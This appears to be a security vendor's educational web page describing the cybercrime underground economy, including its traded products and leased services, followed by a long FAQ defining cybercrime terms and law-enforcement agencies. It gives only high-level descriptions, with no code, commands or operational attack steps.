Table of contents

Cybercrime: The Underground Economy

3 min. read

The success of any industry is reliant on its economics – the ­production, allocation and use of its goods and services. Cybercrime is no different, maintaining its own economy of commoditized products and services.

 

Products

The cybercrime economy’s products, like any other industry’s offerings,­ benefit both sellers and the buyers. The sellers benefit from quick and discrete­ payout and the buyers benefit from “out of the box” malicious operations that can be implemented immediately. These products can be categorized into two main groups: information and resources.

Information includes commodities such as:

  • Stolen personally identifiable information (PII): This includes everything from mass email lists used by spammers to full identity theft packages to commit financial fraud.
  • Exfiltrated organizational information: This includes intellectual capital/property, nonpublic internal data and internal operational details.
  • Harvested authentication credentials: Stolen username and password combinations­ continue to present a significant risk these days, especially when the same credentials are re-used across multiple sites.
  • Pilfered financial data: Unauthorized withdrawals from accounts or charges against credit lines continue to plague account holders.

Resources include such elements as:

  • Access to feature-rich malware: Malware across varying capabilities (e.g., ­information stealers, remote administration tools – RATs, ransomware, ­purpose-built utilities) that demonstrate consistent results and avoid source code leakage can generate significant revenue for associated authors and distributors.
  • Purchase of system or software exploits: While many white hats elect to support bug bounty initiatives by vendors, there remains a lucrative underground market for reliable, unpatched exploits.
  • Transfer of control for previously compromised machines: This usually applies to always-on servers that can then be used as attack platforms or sold for the information­ they store.
  • Malicious actor training: Training is offered through guidebooks or tutorials on effective tool usage and specific tactics, techniques and procedures (TTPs).

 

Services

The services offered within the cybercrime economy utilizes a leasing structure, where access to a product is promised at a set rate for a fixed period of time. The sellers benefit from a guaranteed recurring revenue stream over an extended period of time, and buyers benefit from the continued availability and performance of malicious tools.

These services include offerings such as:

  • Distributed denial of service (DDoS): These are botnet powered attacks that affect the availability of targeted servers and capabilities.
  • Exploit kits (EKs): As part of the service offering, exploit kits are typically leased with a monthly rate for access to the exploit toolkit, allowing for customized end payloads.
  • Infrastructure rental: These include hosting services for attack platforms, malware updates, configuration, command and control (C2), and other attack lifecycle functions.
  • Money laundering: This is known as the transfer (“money muling”) of illegally obtained funds through accounts and mechanisms in money haven countries remains a key service.

Stay ahead of cyberthreats with the latest threat intelligence from the Unit 42 Threat Research Center.

Cybercrime FAQs

Cybercrime refers to any criminal activity that targets or uses computers, networks, or cloud infrastructure to commit fraud, disrupt operations, steal data, or extort victims. Techniques include phishing, ransomware deployment, credential theft, and cloud abuse. Threat actors range from financially motivated syndicates to state-backed offensive teams.
Cyber extortion uses digital threats — such as ransomware, data leaks, or DDoS attacks — to coerce victims into paying a ransom. Attackers may encrypt data, exfiltrate sensitive files, or threaten reputational damage. In cloud environments, extortion increasingly targets storage buckets, backups, and SaaS collaboration platforms.
Cyberstalking involves persistent, unwanted surveillance or harassment through digital channels. Attackers use social media, messaging platforms, and location tracking to intimidate or monitor victims. In corporate settings, cyberstalking may escalate into insider threats, data leaks, or reputational attacks coordinated through anonymous or pseudonymous accounts.
Carding is the trafficking and use of stolen credit card data for unauthorized transactions. Cybercriminals test cards against merchant sites, automate purchase attempts, and launder funds through synthetic identities. Carding forums on the dark web often facilitate bulk sales of compromised payment credentials harvested from breaches or phishing.
The dark web is an encrypted segment of the internet accessible only through anonymizing tools like Tor. It hosts marketplaces for stolen credentials, malware, and attack infrastructure. Threat actors use it to share breach data, coordinate ransomware campaigns, and advertise access to compromised cloud environments.
A botnet is a network of compromised devices controlled by an attacker to execute coordinated tasks. Bots may run DDoS attacks, send spam, mine cryptocurrency, or brute force credentials. Cloud-hosted VMs, unsecured IoT devices, and misconfigured containers are often recruited into botnets without detection.
A distributed denial-of-service (DDoS) attack overwhelms a service or application with massive traffic from multiple sources. Attackers flood endpoints, APIs, or DNS with requests, exhausting bandwidth or compute resources. In cloud platforms, DDoS attacks can disrupt load balancers, autoscaling services, or regional availability zones.
Hacking is the act of exploiting vulnerabilities in systems, software, or human behavior to gain unauthorized access or control. Motivations range from financial gain to activism or espionage. Cloud-focused hacking often targets IAM misconfigurations, exposed APIs, container escapes, or privilege escalation in multi-tenant architectures.
Cyber espionage collects confidential data from governments, enterprises, or critical infrastructure through stealthy network intrusions. Nation-state actors typically use zero-day exploits, custom implants, and long dwell times. Cloud environments are frequent targets due to centralized identity, rich telemetry, and interconnected SaaS supply chains.
A money mule transfers or launders stolen funds on behalf of cybercriminals, often unknowingly. Attackers recruit mules through fake job offers or online scams. Mules receive wire transfers or cryptocurrency and move assets across accounts, obscuring attribution and complicating recovery after cloud-related financial fraud.
Cyberterrorism leverages digital attacks to instill fear, disrupt infrastructure, or advance ideological agendas. Threat actors may target power grids, hospitals, or cloud-hosted public services. Techniques include destructive malware, website defacement, and attacks on critical SaaS platforms that support national security or civic operations.
A zero-day exploit targets a software vulnerability unknown to the vendor and unpatched at the time of attack. Exploits often deliver remote code execution or privilege escalation. Threat actors weaponize zero-days against browsers, hypervisors, or identity providers in cloud environments to establish initial access or persistence.
Spoofing manipulates identifiers to impersonate a trusted source in digital communication. Attackers forge IP addresses, DNS records, email headers, or caller IDs. In cloud environments, spoofed domains and sender addresses frequently appear in phishing campaigns targeting admin credentials or API tokens.
Scareware uses alarming pop-ups or fake alerts to convince users to install malicious software or pay for unnecessary services. Messages often claim the system is infected or compromised. Scareware may lead to malware deployment, credential theft, or further social engineering through support scams.
Malvertising injects malicious code into legitimate ad networks, reaching users through trusted websites. Scripts may redirect users to exploit kits or silently execute mining code. In cloud environments, attackers also target SaaS-based ad platforms to compromise web applications via embedded third-party content.
Spyware covertly collects data from an infected device, including keystrokes, credentials, and browser activity. Cloud-related spyware may intercept MFA codes, exfiltrate session tokens, or monitor administrator behavior. Threat actors use it to maintain stealthy access and pivot deeper into cloud workloads.
A keylogger records keyboard input to capture credentials, sensitive data, or command-line activity. Attackers install keyloggers via phishing, infected software, or malicious browser extensions. In cloud environments, stolen input can yield root credentials, API keys, or secrets used for privilege escalation.
A Trojan horse disguises malicious code as a legitimate application to gain initial access. Once executed, it can install backdoors, deploy spyware, or exfiltrate data. Cloud-related Trojans may impersonate admin tools, SDKs, or remote management utilities targeting developers and infrastructure teams.
A drive-by download occurs when malicious code executes automatically upon visiting a compromised or malicious site. Attackers exploit browser flaws or deliver payloads via hidden iframes and script injections. Victims need not click anything. Drive-by attacks often serve miners, RATs, or credential stealers.
A watering hole attack compromises a website frequented by a target group, injecting malware or exploit code. The goal is to infect visitors from a specific industry or organization. In cloud scenarios, attackers may target developer forums, documentation sites, or SaaS login portals.
Deepfake fraud uses synthetic media — audio or video generated with AI — to impersonate trusted individuals. Attackers spoof executives in real-time calls or pre-recorded videos to authorize wire transfers or release credentials. Cloud collaboration platforms and conferencing tools increase the surface area for deepfake-based social engineering.
Cryptojacking hijacks compute resources to mine cryptocurrency without user consent. Attackers deliver mining code via malware, browser scripts, or compromised containers. In cloud environments, cryptojacking often targets underprotected workloads, misconfigured orchestration platforms, or excessive IAM permissions that allow unauthorized deployment of mining infrastructure.
A remote access trojan (RAT) provides attackers covert, persistent control over a compromised system. It establishes a command-and-control channel, allowing execution of arbitrary commands, file manipulation, screen capture, and credential theft. In cloud environments, RATs often target endpoints with privileged access to internal systems or SaaS consoles.
Crimeware refers to malware explicitly designed to facilitate cybercrime. It includes credential stealers, banking trojans, ransomware, and exploit kits. Toolkits often feature automation, evasion capabilities, and affiliate monetization. Cloud-focused variants target infrastructure credentials, API keys, and access tokens for lateral movement or data exfiltration.
ATM skimming captures data from a bank card’s magnetic stripe and, in many cases, the associated PIN. Attackers install physical skimmers and hidden cameras or use Bluetooth-enabled devices. Collected data enables fraudulent withdrawals or card cloning. The technique rarely intersects with cloud, but the stolen data often fuels cybercrime.
Click fraud generates illegitimate ad clicks to inflate revenue or drain competitors’ ad budgets. Attackers deploy bots, script-based automation, or incentivized human traffic. In cloud infrastructure, adversaries may use compromised virtual machines or containers to scale fraud operations without incurring cost.
DNS hijacking manipulates domain resolution to redirect traffic to malicious or unintended destinations. Attackers may compromise DNS records, poison caches, or intercept queries via rogue resolvers. Cloud environments are vulnerable when DNS configurations are mismanaged or when external dependencies lack record validation.
A rootkit hides the presence of malicious software by modifying low-level system components such as the kernel, drivers, or firmware. It enables stealthy persistence, evasion from detection, and privileged control. In virtualized or containerized cloud environments, kernel-level rootkits pose significant risk to shared infrastructure.
Fileless malware operates entirely in memory, avoiding traditional file-based detection. It exploits trusted processes or system tools like PowerShell, WMI, or Bash to execute payloads. In cloud-hosted systems, fileless threats often leverage living-off-the-land techniques and abuse identity tokens for undetected lateral movement.
Backdoor access allows unauthorized entry into a system through hidden credentials, hardcoded accounts, or malicious modifications to authentication logic. Attackers use backdoors to maintain persistence or regain access after cleanup. In cloud environments, backdoors may reside in CI/CD pipelines, API gateways, or IaC templates.
Cyberattack infrastructure comprises the technical components that enable malicious campaigns — command-and-control servers, phishing domains, proxy networks, malware loaders, and staging environments. Operators often distribute infrastructure across bulletproof hosts, dynamic DNS, and cloud providers to ensure redundancy, scalability, and evasion of takedown efforts.
Bulletproof hosting provides resilient infrastructure for cybercriminals by ignoring abuse complaints and takedown requests. Providers may host phishing kits, C2 servers, illegal marketplaces, or exploit kits. They operate in jurisdictions with weak enforcement or exploit legal loopholes, shielding operators from law enforcement disruption.
INTERPOL is the International Criminal Police Organization, coordinating cross-border law enforcement among 195 member countries. Its Cybercrime Directorate supports global efforts against ransomware, child exploitation, and fraud. INTERPOL issues notices, runs operations with national agencies, and facilitates intelligence sharing through its secure communications network.
Europol is the European Union Agency for Law Enforcement Cooperation. Its European Cybercrime Centre (EC3) combats online fraud, dark web marketplaces, and large-scale ransomware operations. Europol coordinates international investigations, provides forensic expertise, and partners with industry to dismantle cybercriminal infrastructure across EU member states.
The FBI Cyber Division investigates high-level cyber threats to U.S. national security, critical infrastructure, and financial systems. It leads operations against state-sponsored intrusions, ransomware gangs, and online fraud rings. The division collaborates with private sector partners, intelligence agencies, and global law enforcement via the National Cyber Investigative Joint Task Force.
The US Secret Service investigates cyber-enabled financial crimes, including business email compromise, card fraud, and ransomware. Its Cyber Fraud Task Forces combine law enforcement, private sector, and intelligence resources. The agency also runs digital forensics labs and supports international takedowns of cybercrime infrastructure.
The Cybersecurity and Infrastructure Security Agency (CISA) leads U.S. efforts to secure federal networks and critical infrastructure. CISA publishes threat advisories, coordinates incident response, and operates vulnerability disclosure programs. It supports cloud resilience through Secure Cloud Business Applications guidance and sector-specific risk mitigation strategies.
The UK’s National Cyber Security Centre (NCSC) provides threat intelligence, incident response, and best practices to defend public and private sector systems. It publishes advisories on cloud hardening, zero trust, and secure software development. NCSC also partners with international allies to combat large-scale cyber threats.
The US Department of Justice (DOJ) prosecutes cybercrime and enforces federal cybersecurity laws. It leads indictments against ransomware groups, espionage actors, and fraud syndicates. DOJ's Computer Crime and Intellectual Property Section (CCIPS) collaborates with FBI and international agencies to dismantle cybercriminal networks and recover stolen assets.
The Internet Crime Complaint Center (IC3) is the FBI’s central platform for collecting reports of internet-enabled crime. IC3 aggregates data from individuals and businesses, issues public alerts, and supports investigations. It plays a key role in identifying BEC trends, coordinating takedowns, and tracking financial fraud schemes.
The UK’s National Crime Agency (NCA) targets serious and organized crime, including cyber operations. Its National Cyber Crime Unit disrupts ransomware groups, dark web vendors, and credential fraud rings. The NCA collaborates with Europol, FBI, and industry partners to run offensive cyber operations and intelligence collection.
A Computer Emergency Response Team (CERT) provides coordinated incident response and cybersecurity guidance for a specific organization, sector, or nation. CERTs investigate breaches, distribute vulnerability alerts, and issue indicators of compromise. In cloud-focused events, CERTs often assist with cross-platform forensics and containment strategy.
US Cyber Command (USCYBERCOM) conducts defensive and offensive cyberspace operations to protect national interests. It defends DoD networks, counters advanced persistent threats, and executes strategic deterrence missions. Cyber Command works closely with NSA and supports cloud infrastructure resilience during campaigns against state-sponsored cyber actors.
Cyber police refer to national or regional law enforcement units specializing in digital crime. These agencies investigate data breaches, fraud, malware distribution, and cyberstalking. In many countries, cyber police operate under interior ministries or national security agencies, often collaborating with private cloud providers for evidence gathering.
The Federal Trade Commission (FTC) enforces consumer protection laws and privacy regulations in the U.S. It investigates data breaches, deceptive security practices, and privacy violations. The FTC can impose penalties, mandate security controls, and enforce cloud vendor compliance with data handling and breach notification rules.
A data protection authority (DPA) enforces privacy laws such as GDPR, CCPA, or PIPEDA within its jurisdiction. DPAs audit data controllers, investigate cloud misconfigurations, and sanction non-compliance. They also provide guidance on encryption, retention, and cross-border transfers of data in multi-tenant cloud environments.
The Financial Crimes Enforcement Network (FinCEN) monitors financial systems for illicit activity, including cybercrime proceeds. It collects and analyzes suspicious activity reports, enforces AML regulations, and tracks ransomware-related laundering through crypto exchanges. FinCEN collaborates with law enforcement and cloud-based fintechs to disrupt digital money laundering.